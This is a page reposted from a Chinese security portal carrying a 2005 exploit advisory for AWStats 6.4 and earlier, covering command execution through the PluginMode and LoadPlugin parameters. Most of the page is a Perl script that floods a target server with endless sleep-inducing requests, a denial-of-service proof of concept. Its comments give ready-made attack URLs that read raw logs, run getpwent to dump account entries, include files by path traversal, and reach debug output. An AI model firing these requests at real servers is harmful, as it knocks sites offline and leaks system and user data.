首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
AWStats PluginMode and LoadPlugin Command Execution
来源:www.ghc.ru 作者:str0ke 发布时间:2005-02-18  

AWStats PluginMode and LoadPlugin Command Execution

Summary
AWStats is "a free tool that generates advanced web, ftp or mail server statistics, graphically". Remote exploitation of an input validation vulnerability in AWStats allows attackers to execute arbitrary Perl commands under the privileges of the web server via the PluginMode and LoadPlugin parameter. The following exploit code can be used to test your system for the mentioned vulnerability (the exploit code contains samples and one PoC denial of service exploit).

Credit:
The information has been provided by GHC.

Details
Vulnerable Systems:
* AWStats version 6.4 and prior

Exploit:
#!/usr/bin/perl
#
#
# Summarized the advisory www.ghc.ru GHC: /str0ke
#
# [0] Exploitable example (raw log plugin):
# Attacker can read sensitive information
#
# http://server/cgi-bin/awstats-6.4/awstats.pl?pluginmode=rawlog&loadplugin=rawlog
#
# [1] Perl code execution. (This script)
#
# http://server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent
#
# [2] Arbitrary plugin including.
#
# http://server/cgi-bin/awstats-6.4/awstats.pl?&loadplugin=../../../../usr/libdata/perl/5.00503/blib
#
# [3] Sensetive information leak in AWStats version 6.3(Stable) - 6.4(Development).
# Every user can access debug function:
#
# http://server/cgi-bin/awstats-6.4/awstats.pl?debug=1
# http://server/cgi-bin/awstats-6.4/awstats.pl?debug=2
#
# Be sure to change the $server + /cgi-bin location /str0ke
#

use IO::Socket;
$server = 'www.example.com';
sub ConnectServer {
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80")
|| die "Error\n";
print $socket "GET /cgi-bin/awstats-6.4/awstats.pl?&hack=$rp&PluginMode=:sleep HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "\n\n";
}

while () {
$rp = rand;
&ConnectServer;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·3Com FTP Server Buffer Overflo
·Sami HTTP Server Directory Tra
·Microsoft Office XP Remote Buf
·vbulletin 3.0.x PHP code execu
·Armagetron DoS
·DoS in Quake 3 poc
·Buffer Overflow in OSH
·Arkeia 5.3.x Type 77 Request R
·Linux Kernel <= 2.6.11-rc3
·Arkeia 5.3.x Type 77 Request R
·vBulletin 3.x forumdisplay.php
·Arkeia 5.3.x Type 77 Request R
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved